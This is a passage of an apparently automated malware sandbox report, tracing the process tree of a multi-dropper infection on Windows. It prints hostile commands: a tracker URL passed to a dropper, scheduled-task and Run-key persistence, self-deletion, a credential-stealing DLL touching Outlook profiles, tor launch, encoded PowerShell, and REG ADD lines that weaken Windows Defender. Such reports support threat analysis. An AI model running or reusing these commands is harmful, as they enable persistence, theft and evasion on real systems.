C:\Users\Admin\AppData\Local\Temp\3A2F1MAI23B9J52.exehttps://iplogger.org/1x5az75⤵
- Executes dropped EXE
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:5640 -
C:\Users\Admin\AppData\Local\Temp\0B7121CH132B0JI.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4320 -
C:\Users\Admin\AppData\Local\Temp\IHH9FGG6KIID6CG.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2596 -
C:\Users\Admin\Pictures\Adobe Films\HNYUwmuil6MtmEKe7lmDsMC3.exe"C:\Users\Admin\Pictures\Adobe Films\HNYUwmuil6MtmEKe7lmDsMC3.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
PID:3680 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /tn COMSurrogate /f /sc onlogon /rl highest /tr "C:\Users\Admin\AppVerif\DllHelper.exe"4⤵
- Creates scheduled task(s)
PID:5768 -
C:\Users\Admin\AppVerif\DllHelper.exe"C:\Users\Admin\AppVerif\DllHelper.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3180 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"5⤵PID:1180
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\Admin\Pictures\Adobe Films\HNYUwmuil6MtmEKe7lmDsMC3.exe"4⤵PID:1816
-
C:\Windows\SysWOW64\chcp.comchcp 650015⤵PID:440
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.15⤵
- Runs ping.exe
PID:6000 -
C:\Users\Admin\Pictures\Adobe Films\vl16pz8ikehSoCEiO6vpU86F.exe"C:\Users\Admin\Pictures\Adobe Films\vl16pz8ikehSoCEiO6vpU86F.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4040 -
C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe"C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3964 -
C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe"C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Modifies system certificate store
PID:4552 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\72bf7303-5dc0-44e9-87d8-698f8677acab" /deny *S-1-1-0:(OI)(CI)(DE,DC)5⤵
- Modifies file permissions
PID:3300 -
C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe"C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe" --Admin IsNotAutoStart IsNotTask5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5584 -
C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe"C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe" --Admin IsNotAutoStart IsNotTask6⤵
- Executes dropped EXE
- Checks computer location settings
PID:5716 -
C:\Users\Admin\AppData\Local\41d357c0-b3ba-4dab-aeaa-886a78efcdac\build2.exe"C:\Users\Admin\AppData\Local\41d357c0-b3ba-4dab-aeaa-886a78efcdac\build2.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4116 -
C:\Users\Admin\AppData\Local\41d357c0-b3ba-4dab-aeaa-886a78efcdac\build2.exe"C:\Users\Admin\AppData\Local\41d357c0-b3ba-4dab-aeaa-886a78efcdac\build2.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:5624 -
C:\Users\Admin\Pictures\Adobe Films\Kog456fPoi_qlj0gOuQ1ue72.exe"C:\Users\Admin\Pictures\Adobe Films\Kog456fPoi_qlj0gOuQ1ue72.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
PID:1216 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 4524⤵
- Program crash
PID:2332 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 7644⤵
- Program crash
PID:3832 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 7724⤵
- Program crash
PID:2380 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 8164⤵
- Program crash
PID:2156 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 8244⤵
- Program crash
PID:4324 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 9564⤵
- Program crash
PID:5156 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 10164⤵
- Program crash
PID:5316 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 13564⤵
- Program crash
PID:5732 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Kog456fPoi_qlj0gOuQ1ue72.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\Kog456fPoi_qlj0gOuQ1ue72.exe" & exit4⤵PID:6064
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Kog456fPoi_qlj0gOuQ1ue72.exe" /f5⤵
- Kills process with taskkill
PID:5268 -
C:\Users\Admin\Pictures\Adobe Films\CzOCCnZhsTntOC1DD4Afra50.exe"C:\Users\Admin\Pictures\Adobe Films\CzOCCnZhsTntOC1DD4Afra50.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:2712 -
C:\Windows\SysWOW64\attrib.exeattrib -?4⤵
- Views/modifies file attributes
PID:5056 -
C:\Windows\SysWOW64\cmd.execmd /c cmd < Inebriarti.htm & ping -n 5 localhost4⤵PID:3788
-
C:\Windows\SysWOW64\cmd.execmd5⤵PID:4460
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq PSUAService.exe"6⤵
- Enumerates processes with tasklist
PID:5084 -
C:\Windows\SysWOW64\find.exefind /I /N "psuaservice.exe"6⤵PID:5912
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^DPPUlpMDoxxhVrUIPtlDSFKoNmARJTULbxHxsooLczeCBvhhRbTNaFvXtGiKJUTgAJQAcAsHWmomCiGsjjZjquaSYKfKqbwAmNeS$" Strette.htm6⤵PID:79052
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tal.exe.pifTal.exe.pif H6⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:109144 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tal.exe.pifC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tal.exe.pif7⤵PID:5356
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 56⤵
- Runs ping.exe
PID:109156 -
C:\Windows\SysWOW64\PING.EXEping -n 5 localhost5⤵
- Runs ping.exe
PID:109376 -
C:\Users\Admin\Pictures\Adobe Films\FzbLA0y21wf4Eb_GXZGPAkPK.exe"C:\Users\Admin\Pictures\Adobe Films\FzbLA0y21wf4Eb_GXZGPAkPK.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
PID:3244 -
C:\ProgramData\50543188494393494002.exe"C:\ProgramData\50543188494393494002.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
PID:5800 -
C:\Users\Admin\AppData\Local\Temp\62eca45584\bguuwe.exe"C:\Users\Admin\AppData\Local\Temp\62eca45584\bguuwe.exe"5⤵
- Executes dropped EXE
- Checks computer location settings
PID:3288 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\62eca45584\6⤵PID:376
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\62eca45584\7⤵PID:5888
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN bguuwe.exe /TR "C:\Users\Admin\AppData\Local\Temp\62eca45584\bguuwe.exe" /F6⤵
- Creates scheduled task(s)
PID:4700 -
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\110809d565579c\cred.dll, Main6⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Accesses Microsoft Outlook profiles
- outlook_win_path
PID:4832 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5800 -s 11085⤵
- Program crash
PID:876 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im FzbLA0y21wf4Eb_GXZGPAkPK.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\FzbLA0y21wf4Eb_GXZGPAkPK.exe" & del C:\ProgramData\*.dll & exit4⤵PID:2400
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im FzbLA0y21wf4Eb_GXZGPAkPK.exe /f5⤵
- Kills process with taskkill
PID:6060 -
C:\Windows\SysWOW64\timeout.exetimeout /t 65⤵
- Delays execution with timeout.exe
PID:3196 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3244 -s 19284⤵
- Program crash
PID:4624 -
C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe"C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2520 -
C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe"C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2020 -
C:\Users\Admin\Pictures\Adobe Films\TUsKZ9i3PovwwAgsSaLpghkJ.exe"C:\Users\Admin\Pictures\Adobe Films\TUsKZ9i3PovwwAgsSaLpghkJ.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:5060
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 1216 -ip 12161⤵PID:3636
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:1296
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1216 -ip 12161⤵PID:3368
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1216 -ip 12161⤵PID:4980
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1216 -ip 12161⤵PID:3744
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1216 -ip 12161⤵PID:2380
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1216 -ip 12161⤵PID:756
-
C:\Users\Admin\AppData\Local\72bf7303-5dc0-44e9-87d8-698f8677acab\kdnmdIr2m3Z75rmoxMQY45zR.exe"C:\Users\Admin\AppData\Local\72bf7303-5dc0-44e9-87d8-698f8677acab\kdnmdIr2m3Z75rmoxMQY45zR.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4324 -
C:\Users\Admin\AppData\Local\72bf7303-5dc0-44e9-87d8-698f8677acab\kdnmdIr2m3Z75rmoxMQY45zR.exe"C:\Users\Admin\AppData\Local\72bf7303-5dc0-44e9-87d8-698f8677acab\kdnmdIr2m3Z75rmoxMQY45zR.exe"2⤵
- Executes dropped EXE
PID:5224
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1216 -ip 12161⤵PID:5244
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2284 -ip 22841⤵PID:5380
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 1216 -ip 12161⤵PID:5696
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1744 -ip 17441⤵PID:5968
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3244 -ip 32441⤵PID:4332
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 5800 -ip 58001⤵PID:5680
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:5248
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3608 -ip 36081⤵PID:1156
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 472 -p 5436 -ip 54361⤵PID:5660
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 3608 -ip 36081⤵PID:2076
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 3608 -ip 36081⤵PID:3468
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 3608 -ip 36081⤵PID:2004
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global1⤵
- Process spawned unexpected child process
PID:5748 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global2⤵
- Loads dropped DLL
PID:5512 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5512 -s 6083⤵
- Program crash
PID:5116
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 5512 -ip 55121⤵PID:4152
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 3608 -ip 36081⤵PID:5304
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 3608 -ip 36081⤵PID:4376
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3608 -ip 36081⤵PID:5280
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵PID:376
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:6860
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 3608 -ip 36081⤵PID:1180
-
C:\Users\Admin\AppData\Local\Temp\3A8A.exeC:\Users\Admin\AppData\Local\Temp\3A8A.exe1⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
PID:4452 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANAAwAA==2⤵PID:5304
-
C:\Users\Admin\AppData\Local\Temp\3A8A.exeC:\Users\Admin\AppData\Local\Temp\3A8A.exe2⤵PID:3972
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:2476
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2476 -s 8722⤵
- Program crash
PID:452
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 2476 -ip 24761⤵PID:2488
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:2952
-
C:\Users\Admin\AppData\Local\Temp\4A1B.exeC:\Users\Admin\AppData\Local\Temp\4A1B.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1260 -
C:\Users\Admin\AppData\Local\Temp\4A1B.exeC:\Users\Admin\AppData\Local\Temp\4A1B.exe2⤵
- Executes dropped EXE
- Checks computer location settings
PID:5340 -
C:\Users\Admin\AppData\Local\Temp\4A1B.exe"C:\Users\Admin\AppData\Local\Temp\4A1B.exe" --Admin IsNotAutoStart IsNotTask3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3880 -
C:\Users\Admin\AppData\Local\Temp\4A1B.exe"C:\Users\Admin\AppData\Local\Temp\4A1B.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Executes dropped EXE
- Checks computer location settings
PID:6076 -
C:\Users\Admin\AppData\Local\09dfb731-f846-4759-8506-2a169e20e63b\build2.exe"C:\Users\Admin\AppData\Local\09dfb731-f846-4759-8506-2a169e20e63b\build2.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4980 -
C:\Users\Admin\AppData\Local\09dfb731-f846-4759-8506-2a169e20e63b\build2.exe"C:\Users\Admin\AppData\Local\09dfb731-f846-4759-8506-2a169e20e63b\build2.exe"6⤵PID:3760
-
C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe"C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe" --nt-service -f "C:\Users\Admin\AppData\Local\Temp\csrss\tor\torrc" --Log "notice file C:\Users\Admin\AppData\Local\Temp\csrss\tor\log.txt"1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6116
-
C:\Users\Admin\AppData\Local\Temp\jwzeqsilllyafcnn.exe"C:\Users\Admin\AppData\Local\Temp\jwzeqsilllyafcnn.exe"1⤵
- Executes dropped EXE
PID:4040 -
C:\Users\Admin\AppData\Local\Microsoft\WindowsApps\Get-Variable.exe"C:\Users\Admin\AppData\Local\Microsoft\WindowsApps\Get-Variable.exe"2⤵PID:4668
-
C:\Users\Admin\AppData\Local\Temp\signed.exe"C:\Users\Admin\AppData\Local\Temp\signed.exe"3⤵
- Adds Run key to start application
PID:3916 -
C:\ProgramData\MsDrvSrvc.exe"C:\ProgramData\MsDrvSrvc.exe"4⤵PID:1524
-
C:\Windows\SysWOW64\schtasks.exe/create /tn COMSurrogate /st 00:00 /du 9999:59 /sc once /ri 1 /f /tr "powershell.exe -windowstyle hidden"2⤵
- Creates scheduled task(s)
PID:1524
-
C:\Users\Admin\AppData\Local\Temp\6DF1.exeC:\Users\Admin\AppData\Local\Temp\6DF1.exe1⤵
- Executes dropped EXE
- Checks computer location settings
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3204
-
C:\Users\Admin\AppData\Local\Temp\62eca45584\bguuwe.exeC:\Users\Admin\AppData\Local\Temp\62eca45584\bguuwe.exe1⤵PID:804
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 804 -s 4842⤵
- Program crash
PID:6220
-
C:\Users\Admin\AppData\Local\Temp\7BCD.exeC:\Users\Admin\AppData\Local\Temp\7BCD.exe1⤵
- Executes dropped EXE
- Checks computer location settings
PID:3484 -
C:\Users\Admin\AppData\Local\Temp\nijiccssjnaevyew.exe"C:\Users\Admin\AppData\Local\Temp\nijiccssjnaevyew.exe"2⤵PID:4052
-
C:\Users\Admin\AppData\Local\Temp\8AF1.exeC:\Users\Admin\AppData\Local\Temp\8AF1.exe1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3624
-
C:\Users\Admin\AppData\Local\Temp\987E.exeC:\Users\Admin\AppData\Local\Temp\987E.exe1⤵PID:4404
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4404 -s 3402⤵
- Program crash
PID:5288
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:2448
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2448 -s 8722⤵
- Program crash
PID:4332
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 2448 -ip 24481⤵PID:6104
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 4404 -ip 44041⤵PID:5744
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:3548
-
C:\Users\Admin\AppData\Local\Temp\CE07.exeC:\Users\Admin\AppData\Local\Temp\CE07.exe1⤵
- Suspicious use of SetThreadContext
PID:4944 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"2⤵PID:4344
-
C:\Users\Admin\AppData\Local\Temp\EF2C.exeC:\Users\Admin\AppData\Local\Temp\EF2C.exe1⤵PID:3936
-
C:\Users\Admin\AppData\Local\Temp\EF2C.exeC:\Users\Admin\AppData\Local\Temp\EF2C.exe2⤵
- Loads dropped DLL
PID:1088
-
C:\Users\Admin\AppData\Local\Temp\F576.exeC:\Users\Admin\AppData\Local\Temp\F576.exe1⤵
- Suspicious use of SetThreadContext
PID:4904 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"2⤵PID:109088
-
C:\Users\Admin\AppData\Local\Temp\F7E8.exeC:\Users\Admin\AppData\Local\Temp\F7E8.exe1⤵PID:13680
-
C:\Users\Admin\AppData\Local\Temp\FB35.exeC:\Users\Admin\AppData\Local\Temp\FB35.exe1⤵PID:24408
-
C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"2⤵
- Suspicious behavior: AddClipboardFormatListener
PID:65352 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 24408 -s 11322⤵
- Program crash
PID:65324
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:24400
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:41600
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:58704
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 688 -p 24408 -ip 244081⤵PID:65492
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:64960
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:65252
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:73132
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:72848
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:85472
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:99312
-
C:\Users\Admin\AppData\Local\Temp\XPKruKcwkyRJuFApW\EdLqPAaTytMGRMX\SVjvbHJ.exeC:\Users\Admin\AppData\Local\Temp\XPKruKcwkyRJuFApW\EdLqPAaTytMGRMX\SVjvbHJ.exe bH /site_id 525403 /S1⤵
- Drops file in System32 directory
PID:109108 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1464 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:4660
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
- Executes dropped EXE
PID:4052 -
